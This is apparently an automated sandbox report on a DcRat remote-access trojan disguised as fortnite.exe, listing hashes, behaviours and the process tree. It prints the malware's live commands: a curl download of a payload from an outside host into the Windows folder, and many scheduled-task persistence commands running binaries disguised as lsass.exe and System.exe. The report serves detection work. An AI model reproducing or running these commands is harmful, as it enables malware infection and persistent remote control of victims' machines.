Analysis
-
max time kernel
97s -
max time network
153s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
04/11/2024, 06:11
Static task
static1
Behavioral task
behavioral1
Sample
fortnite.exe
Resource
win10ltsc2021-20241023-en
General
-
Target
fortnite.exe
-
Size
1.3MB
-
MD5
8d17e6244d984c3c44bd9efa22d90bd3
-
SHA1
88c8edaa2ea2ed078454e738b1e30c882bbe3ee5
-
SHA256
5b4c539067dc6db394d2367305e53555c250d636379acb2b384efe3d77738c63
-
SHA512
bf800abfc7cd57fdc3c2ccd07527ba76f47d6d5426bb2d9107379db74e4b6d07ac4e8b6ff3f468e20a5e5302a01f9c1d39a0fe1bc2af4670bf8a00cab2ffdf1e
-
SSDEEP
12288:6pqafF/eav6841vwUZF/NmXHBg52Kn4UxCj2AqeMQm6ZQyRWkhuq3nbep3+bKDZs:9Q/PDVQcE2Kn4uGKF6lpC+bKlAtc06L
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2256 5012 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4344 5012 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2760 5012 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1792 5012 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1992 5012 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1988 5012 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5064 5012 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4372 5012 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4936 5012 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 732 5012 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3104 5012 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 756 5012 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1344 5012 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2580 5012 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3100 5012 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4740 5012 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2248 5012 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4680 5012 schtasks.exe 91 -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation MsHyperDhcp.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation fortnite.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation physmeme.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 3 IoCs
pid Process 3436 physmeme.exe 1436 MsHyperDhcp.exe 1544 System.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Internet Explorer\images\System.exe MsHyperDhcp.exe File created C:\Program Files\Internet Explorer\images\27d1bcfc3c54e0 MsHyperDhcp.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Speech\physmeme.exe curl.exe File created C:\Windows\fr-FR\cmd.exe MsHyperDhcp.exe File created C:\Windows\fr-FR\ebf1f9fa8afd6d MsHyperDhcp.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language physmeme.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3352 PING.EXE -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings physmeme.exe Key created \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings MsHyperDhcp.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3352 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2580 schtasks.exe 5064 schtasks.exe 4936 schtasks.exe 3104 schtasks.exe 756 schtasks.exe 2760 schtasks.exe 4372 schtasks.exe 732 schtasks.exe 4344 schtasks.exe 1792 schtasks.exe 4740 schtasks.exe 1344 schtasks.exe 3100 schtasks.exe 2248 schtasks.exe 4680 schtasks.exe 2256 schtasks.exe 1992 schtasks.exe 1988 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1436 MsHyperDhcp.exe 1544 System.exe 1544 System.exe 1544 System.exe 1544 System.exe 1544 System.exe 1544 System.exe 1544 System.exe 1544 System.exe 1544 System.exe 1544 System.exe 1544 System.exe 1544 System.exe 1544 System.exe 1544 System.exe 1544 System.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1436 MsHyperDhcp.exe Token: SeDebugPrivilege 1544 System.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 1552 wrote to memory of 1132 1552 fortnite.exe 83 PID 1552 wrote to memory of 1132 1552 fortnite.exe 83 PID 1132 wrote to memory of 4472 1132 cmd.exe 84 PID 1132 wrote to memory of 4472 1132 cmd.exe 84 PID 1552 wrote to memory of 3436 1552 fortnite.exe 86 PID 1552 wrote to memory of 3436 1552 fortnite.exe 86 PID 1552 wrote to memory of 3436 1552 fortnite.exe 86 PID 3436 wrote to memory of 4888 3436 physmeme.exe 87 PID 3436 wrote to memory of 4888 3436 physmeme.exe 87 PID 3436 wrote to memory of 4888 3436 physmeme.exe 87 PID 4888 wrote to memory of 4500 4888 WScript.exe 95 PID 4888 wrote to memory of 4500 4888 WScript.exe 95 PID 4888 wrote to memory of 4500 4888 WScript.exe 95 PID 4500 wrote to memory of 1436 4500 cmd.exe 97 PID 4500 wrote to memory of 1436 4500 cmd.exe 97 PID 1436 wrote to memory of 4580 1436 MsHyperDhcp.exe 116 PID 1436 wrote to memory of 4580 1436 MsHyperDhcp.exe 116 PID 4580 wrote to memory of 4748 4580 cmd.exe 118 PID 4580 wrote to memory of 4748 4580 cmd.exe 118 PID 4580 wrote to memory of 3352 4580 cmd.exe 119 PID 4580 wrote to memory of 3352 4580 cmd.exe 119 PID 4580 wrote to memory of 1544 4580 cmd.exe 121 PID 4580 wrote to memory of 1544 4580 cmd.exe 121 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
cURL User-Agent 1 IoCs
Uses User-Agent string associated with cURL utility.
description flow ioc HTTP User-Agent header 4 curl/8.7.1
Processes
-
C:\Users\Admin\AppData\Local\Temp\fortnite.exe"C:\Users\Admin\AppData\Local\Temp\fortnite.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\physmeme.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\system32\curl.execurl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\physmeme.exe3⤵
- Drops file in Windows directory
PID:4472
-
-
-
C:\Windows\Speech\physmeme.exe"C:\Windows\Speech\physmeme.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3436 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\BridgeHyperBlocknetdhcp\GLo9G56rT0nodgfjz0.vbe"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\BridgeHyperBlocknetdhcp\PvGkvgUzeZLxrr6JqrimKZExUcjf0YvlnNA13ZfWwtdYgG4BZIx.bat" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4500 -
C:\BridgeHyperBlocknetdhcp\MsHyperDhcp.exe"C:\BridgeHyperBlocknetdhcp/MsHyperDhcp.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\akWUL8psfR.bat"6⤵
- Suspicious use of WriteProcessMemory
PID:4580 -
C:\Windows\system32\chcp.comchcp 650017⤵PID:4748
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3352
-
-
C:\Program Files\Internet Explorer\images\System.exe"C:\Program Files\Internet Explorer\images\System.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1544
-
-
-
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Recovery\OEM\fontdrvhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2256
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\OEM\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4344
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Recovery\OEM\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2760
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Windows\fr-FR\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1792
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\fr-FR\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1992
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 6 /tr "'C:\Windows\fr-FR\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1988
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\lsass.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5064
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Default User\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4372
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4936
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Program Files\Internet Explorer\images\System.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:732
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\images\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3104
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files\Internet Explorer\images\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:756
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Contacts\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1344
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Admin\Contacts\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2580
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\Contacts\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3100
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MsHyperDhcpM" /sc MINUTE /mo 10 /tr "'C:\BridgeHyperBlocknetdhcp\MsHyperDhcp.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4740
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MsHyperDhcp" /sc ONLOGON /tr "'C:\BridgeHyperBlocknetdhcp\MsHyperDhcp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2248
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MsHyperDhcpM" /sc MINUTE /mo 12 /tr "'C:\BridgeHyperBlocknetdhcp\MsHyperDhcp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4680
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
253B
MD54bb32a75d150d0312a4f6b779f0b181a
SHA103dd7971f5534a9d5871fc936c40b7aa28c58de8
SHA2561590ca47cc698690025d71afb485ec10be508fc5330e5d074b992f9e4f509b0e
SHA51291d0806fa988cbbdcfa0ec80b69236f8056b0170e484fbc9c7486bca63efdec9bd93f9a31568ac5fe7ef7dd63e7eb88c27be4928ac8e132445c8340bc3a2fff6
-
Filesize
1.8MB
MD58eedebc3e9237f67772e3fc3c3d798ea
SHA1a87e1c10ddbc4c7fdbb69437647f4910216ec689
SHA2562f1c931ea2ef0cb95382657e6947cab4cb463519e1316d5fc3cd752f8de29301
SHA5122cf1015562ea15f3a04a7ca0fbdef489cd84ccc555facec9d94ca890365d7a65b5974442b4d36918d284c8b1cd81b905698eb7fa99b8dc14c55f5cdb05f7c8b9
-
Filesize
86B
MD5280356ba496d0f7d9a0d88c1e5786d93
SHA1d5ccc97c0f4e07736f44240ce25dfcbc93c6ccad
SHA256f6a0387019b90b50ff47c15052970372fec47420680d0d576e0288a0fa632aad
SHA5120bd118a4766c777b2574ac1f5cfd3f71bf3f4698c6a9b6b856abf75c35ff2c47cbdf4a72189155f23cfaf1b340adf1db5ad2fe0acbe16bb60add7850ac0c1ffd
-
Filesize
180B
MD56ee444e708fb689798ddff61c134ba84
SHA1c200479759b0a6234122ccc2e45399161d5953f7
SHA256527977b83eaa31b7062a1d099ab99a31a0a9a44d3f2b257de85ace6bcd450c2c
SHA512d4e1d003c41834bb5f9f1c9082c0064bb31b4c04ade264a3210b194331abff76f673f5cd25fe894f98f86d27fbde7c12a9832214abd13594be926ea99a3232af
-
Filesize
2.1MB
MD5e0216529a1eaed9f919e40074ca84f33
SHA13c2c9e6fc0e096b8aba3c96b3c23431a8aa17cc8
SHA25648cead232045bf8ed6d8dbca3e2072be474fd74ad8901e7a3febe44a9315e5c1
SHA512e03c5823c27b7f6b4b61ecd48a2ab1019da4e10d3de53965a183b03ef5ebdba07532d28e6284b51ceceb7fc4794719220038faccd5cb9d2a767dd82697a969df